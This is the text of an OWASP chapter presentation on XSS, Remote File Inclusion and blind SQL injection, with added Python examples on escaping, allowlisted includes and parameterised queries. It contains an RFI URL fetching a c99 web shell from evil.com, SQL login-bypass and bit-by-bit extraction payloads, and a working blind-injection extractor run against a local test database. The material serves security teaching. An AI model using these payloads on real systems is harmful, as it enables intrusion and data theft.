ANZTB SIGIST May 2011 Perth OWASP: How minor vulnerabilities can do very bad things. OWASP, Wednesday 25th May. The OWASP Foundation


ANZTB SIGIST May 2011 Perth OWASP: How minor vulnerabilities can do very bad things. Christian Frichot / David Taylor, (some of) Perth OWASP's Chapter Leads. OWASP, Wednesday 25th May 2011. Copyright The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation, http://www.owasp.org

Introductions

Why we think this is important.

Impact Crater

Overview of the evening:
- From XSS to total session compromise
- Would you like some BeEF with your XSS?
- Remote File Include, an attacker's best friend
- When RFI met Metasploit
- Useful SQL Injection

A Brief History Of OWASP

Cross Site Scripting (XSS)
"XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites."
What does this mean? Attackers can execute scripts within a user's browser. This may lead to defacement, session hijacking, browser redirection or even the installation of malware.

Reflective XSS (diagram; actors: Authenticated User, Vulnerable App, Evil Server, Attacker)
1. The user receives a lure: "Hi Joe, We've noticed you haven't updated your phone number. Click here to proceed. Thanks."
2. The XSS script forces the browser to submit document.cookie to the Evil Server.
3. document.cookie travels from the user's browser to the Evil Server.
4. The attacker collects the cookies.

Stored XSS (diagram; actors: Attacker, Vulnerable App, Authenticated User, Evil Server)
1. The attacker posts a comment on the blog that includes the XSS payload.
2. The authenticated user visits the blog.
3. document.cookie travels from the user's browser to the Evil Server.
4. The attacker collects the cookies.
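The two diagrams above both hinge on one defect: untrusted data lands in the page without escaping. The following is an added example, not code from the slides or from the SCOAT application they describe; it uses Python's standard library as a stand-in for the PHP app and the function names are assumptions. It shows the vulnerable concatenation beside contextual output encoding for the HTML body, attribute and URL contexts, which is the "proper validation and escaping" the OWASP definition calls for.

```python
import html
from urllib.parse import urlencode

# Constructed attacker-controlled input of the kind a search page reflects;
# the script tag stands in for the "XSS script" in the diagrams.
UNTRUSTED = "<script>alert(document.cookie)</script>"


def render_unescaped(name: str) -> str:
    """The vulnerable pattern: untrusted data concatenated straight into HTML,
    so the browser parses the input as markup and runs the script."""
    return f"<p>Hello {name}</p>"


def render_escaped(name: str) -> str:
    """HTML body context: html.escape turns <, >, &, ' and " into entities,
    so the browser shows the text instead of executing it."""
    return f"<p>Hello {html.escape(name, quote=True)}</p>"


def render_attribute(name: str) -> str:
    """Attribute context: the value must be quoted AND the quote characters
    escaped, otherwise input can close the attribute and add an event handler."""
    return f'<input type="text" value="{html.escape(name, quote=True)}">'


def render_query_link(name: str) -> str:
    """URL parameter context: percent-encode first (urlencode), then HTML-escape
    the result because it is being placed inside an href attribute."""
    return '<a href="/search?' + html.escape(urlencode({"q": name})) + '">again</a>'


def contains_live_script(rendered: str) -> bool:
    """Crude check used by the test: is an unescaped <script tag in the output?"""
    return "<script" in rendered.lower()
```

Escaping is context-specific: the entity encoding that is right for the HTML body is wrong inside a JavaScript string or a URL, so each output location needs its own encoder. Independently of escaping, marking the session cookie HttpOnly keeps it out of document.cookie, which blunts the cookie theft step in both diagrams even if an XSS bug slips through.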

Injection
"Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorised data."
What does this mean? Injection can result in data loss or corruption, lack of accountability, or denial of access. In worst case scenarios it can lead to complete host takeover.

Setting the scene: your developers create a Secure Cloud Open Access Tool (SCOAT), a secure portal for exchanging files with customers. Your company, Acme, takes its information very seriously, as most of its intellectual property is contained within.

This slide left intentionally blank

Conclusions from Session Compromise
According to the OWASP Top 10 of 2010, XSS is the most prevalent web application security flaw. The Web Hacking Incident Database (WHID) lists XSS as the 3rd top attack method [1].
Detecting XSS is easy:
- Open Source: w3af, rat, XSSscan.py, XSSFuzz etc.
- Mixed Source: Burp! (If you buy one piece of software, buy this)
- Bling ($$) Source: IBM AppScan, HP WebInspect, NTOSpider
[1] http://www.xiom.com/whid

Session Compromise

Browser Exploitation Framework

(insert demo here)

Conclusions from BeEF injection ;)
- Why do things manually, when you can do them automagically?
- The web browser IS the operating system.
- Clearly demonstrates how a fairly trivial vulnerability can explode into something larger

(insert break here)

*Planet's cheapest car, the Nano.

*This is a Bentley Coupe != planet's cheapest car

But how does an attacker deface a website? RFI, or Remote File Inclusion
- Was in OWASP's Top 10 in 2007
- Used to be highly prevalent in PHP until the default configuration was changed
- Exploits the require or include functions, eg: include $_GET['option'];
- http://www.acme.com/scoat.php?language=http://evil.com/c99.txt
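The defensive counterpart to include $_GET['option'] is to never let the request string become the include target at all. The following is an added example, not code from the slides or from the Acme application; the file names, the install directory and the function names are assumptions, and Python stands in for the PHP page. The request parameter is used only as a key into an allowlist of files the application ships, so a URL such as the one on the slide, a path traversal string or a stream wrapper is simply an unknown key.

```python
from pathlib import Path

# Constructed allowlist: the only language files the page is meant to load.
LANGUAGE_FILES = {"en": "lang/en.php", "de": "lang/de.php", "fr": "lang/fr.php"}
BASE_DIR = Path("/var/www/scoat")  # assumed web root of the SCOAT application


class RejectedParameter(ValueError):
    """Raised when the request parameter is not a file we ship."""


def resolve_language_file(param: str) -> Path:
    """Turn ?language=... into a local file path, or refuse.

    The parameter is only ever used as a dictionary key, so nothing the client
    sends can become the include target directly: if it is not one of our keys
    it is rejected before any path is built."""
    if param not in LANGUAGE_FILES:
        raise RejectedParameter(f"unknown language option: {param!r}")
    candidate = BASE_DIR / LANGUAGE_FILES[param]
    # Belt and braces: whatever the table says, the file must live under BASE_DIR,
    # so a mistaken allowlist entry cannot point outside the application.
    if BASE_DIR not in candidate.parents:
        raise RejectedParameter("allowlist entry escapes the application directory")
    return candidate


def is_accepted(param: str) -> bool:
    """Convenience wrapper: True if the parameter maps to a shipped file."""
    try:
        resolve_language_file(param)
    except RejectedParameter:
        return False
    return True
```

The configuration change the slide alludes to is most likely PHP's allow_url_include directive, which has defaulted to Off since PHP 5.2; that setting is worth leaving off, but the allowlist above does not depend on it, which matters because local file inclusion through the same parameter is not covered by the directive.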

(insert scariness here)

Conclusions
- The web is a great channel for exploiting PCs
- Google's research back in 2007 highlighted: one in 10 web pages contained malicious code
- F-Secure 2010: Adobe Reader files were exploited in almost 49% of targeted attacks in 2009
- Keep your applications up to date!

SQL Injection
The login page of the application is vulnerable to SQL Injection:
SELECT $id FROM dt_users WHERE user='$user' AND pass='$pass'
What happens if we make the username: jdoe' AND 1=1 --
The SQL becomes:
SELECT $id FROM dt_users WHERE user='jdoe' AND 1=1 -- ' AND pass='$pass'
(everything after -- is a comment, so the password check is never evaluated)

Blind SQL Injection
So, we can log into the app without a password - pretty cool. But what if we want to mess with the database some more? The SQL Injection is blind because none of the results from the SELECT are echoed to the browser.

Taking Over The World, 1 Bit At A Time
Essentially we can get 1 bit of data from the database at a time: if the trailing condition evaluates to TRUE, the application gets logged in; if the trailing condition evaluates to FALSE you get the password error message. For example:
SELECT $id FROM dt_users WHERE user='jdoe' AND 1<2 -- → TRUE
SELECT $id FROM dt_users WHERE user='jdoe' AND 1>2 -- → FALSE

Let's take a short detour: Binary Search

Detour: Binary Search

Detour: Binary Search. Example: searching for an ASCII character
- Is character < ASCII code 128? Yes
- Is character < ASCII code 64? No
- Is character < ASCII code 96? Yes
- Is character < ASCII code 80? No
- Is character < ASCII code 88? No
- Is character < ASCII code 92? Yes
- Is character < ASCII code 90? Yes
- Is character < ASCII code 89? No
Character is ASCII 89! ( X )

Detour: Binary Search. Each step in a binary search requires 1 bit of information. We have a SQL Injection bug that reveals 1 bit of information at a time. Binary search, meet Blind SQL Injection. Blind SQL Injection, this is Binary Search.

Blind SQL Injection: Setting it up. The expression is built one layer at a time:
SELECT version()
CAST((SELECT version()) AS CHAR(4000))
SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),1,1)
ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),1,1))

Blind SQL Injection: Putting it into action
SELECT ... WHERE user='jdoe' AND 128>(SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),1,1))) --
SELECT ... WHERE user='jdoe' AND 64>(SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),1,1))) --
SELECT ... WHERE user='jdoe' AND 96>(SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),1,1))) --
And so on, and so on, and so on... And THEN, for the second character:
SELECT ... WHERE user='jdoe' AND 128>(SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),2,1))) --
And so on, and so on, and so on...
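The login bypass from the SQL Injection slide and the one-bit-at-a-time extraction from the Blind SQL Injection slides, as one added example that is not code from the slides or from any of the tools they mention. It runs against an in-memory SQLite database so the whole thing is reproducible offline: the dt_users table, the user jdoe and the password are constructed, and SQLite's sqlite_version(), unicode() and substr() stand in for the version(), ASCII() and SUBSTRING() calls shown on the slides. The function names are assumptions. The vulnerable login is kept exactly as the slide describes it so that the parameterised version can be shown beside it, and the binary search reports how many questions (requests) each character costs.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the dt_users table on the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dt_users (id INTEGER, user TEXT, pass TEXT)")
    conn.execute("INSERT INTO dt_users VALUES (1, 'jdoe', 'correct horse')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """The pattern on the SQL Injection slide: the statement is assembled by
    string concatenation, so the user field can close the quote and add SQL."""
    sql = f"SELECT id FROM dt_users WHERE user='{user}' AND pass='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterised(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """The fix the BSQLi conclusions call for: placeholders keep the input as
    data, so the same payload is just a user name that does not exist."""
    sql = "SELECT id FROM dt_users WHERE user=? AND pass=?"
    return conn.execute(sql, (user, password)).fetchone() is not None


def oracle(conn: sqlite3.Connection, pos: int, bound: int) -> bool:
    """One bit of information, as on the 'Putting it into action' slide: does
    the login succeed when the trailing condition is
    bound > code of character `pos` of the version string?"""
    payload = (f"jdoe' AND {bound}>(SELECT unicode(substr(sqlite_version(),"
               f"{pos},1))) --")
    return login_vulnerable(conn, payload, "irrelevant")


def extract_char(conn: sqlite3.Connection, pos: int) -> tuple:
    """Binary search over the 7-bit ASCII range [0, 128) using the oracle.
    Returns (character, number of questions asked)."""
    lo, hi, asked = 0, 128, 0            # invariant: lo <= code < hi
    while hi - lo > 1:
        mid = (lo + hi) // 2
        asked += 1
        if oracle(conn, pos, mid):       # TRUE means code < mid
            hi = mid
        else:
            lo = mid
    return chr(lo), asked


def extract_string(conn: sqlite3.Connection, length: int) -> str:
    """Walk positions 1..length; every character costs seven questions."""
    return "".join(extract_char(conn, i)[0] for i in range(1, length + 1))


def actual_version() -> str:
    """Ground truth for the test: what the extraction should recover."""
    return sqlite3.sqlite_version


def demo() -> dict:
    """Run both halves against a fresh database and return the results."""
    conn = build_db()
    return {
        "bypass_vulnerable": login_vulnerable(conn, "jdoe' AND 1=1 --", "wrong"),
        "bypass_parameterised": login_parameterised(conn, "jdoe' AND 1=1 --", "wrong"),
        "first_char": extract_char(conn, 1),
        "version": extract_string(conn, len(actual_version())),
    }


if __name__ == "__main__":
    print(demo())
```

Seven login attempts per character, all from one client against one login form, is the "noisy" part of the BSQLi conclusions: a burst of failed and successful logins for the same account whose user field contains SQL keywords is a straightforward thing to alert on in the web server or application logs. The parameterised query removes the oracle entirely, which is why it is the fix rather than the detection.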

Blind SQL Injection: Luckily there are tools to do this for us. (insert pwnage here)

Conclusions (BSQLi)
- Tiny little blind SQL injection bugs can (eventually) leak your entire database
- BSQLi bugs are pretty hard to find (unless you've got the source code)
- Even after you've found them, they are reasonably difficult (and noisy) to exploit
- Validate inputs and use parameterised queries

No tools were harmed in the making of this presentation
- BeEF (http://www.bindshell.net/tools/beef/)
- Metasploit Framework (http://www.metasploit.com/)
- SQLMap (http://sqlmap.sourceforge.net/)
- SQL Power Injector, *not demonstrated (http://www.sqlpowerinjector.com/)
- Burp Suite Professional (http://portswigger.net/burp/)


OWASP Enterprise Security API (ESAPI). Don't write your own security controls! Reinventing the wheel when it comes to developing security controls for every web application or web service leads to wasted time and massive security holes.

ESAPI: not just about preventing XSS/SQLi
- Authentication
- Access Control
- Input Validation
- Output encoding/escaping
- Cryptography
- Error handling and logging
- Communication security
- HTTP security
- Security configuration

OWASP's Development Guide: allows businesses, developers, designers and solution architects to produce secure web applications.

Wrapping it up
- Relatively innocuous bugs can be leveraged to do bad things (to the client or the server)
- Weaponised exploitation frameworks and tools currently exist
- Secure coding practices and security assessments minimise exposure
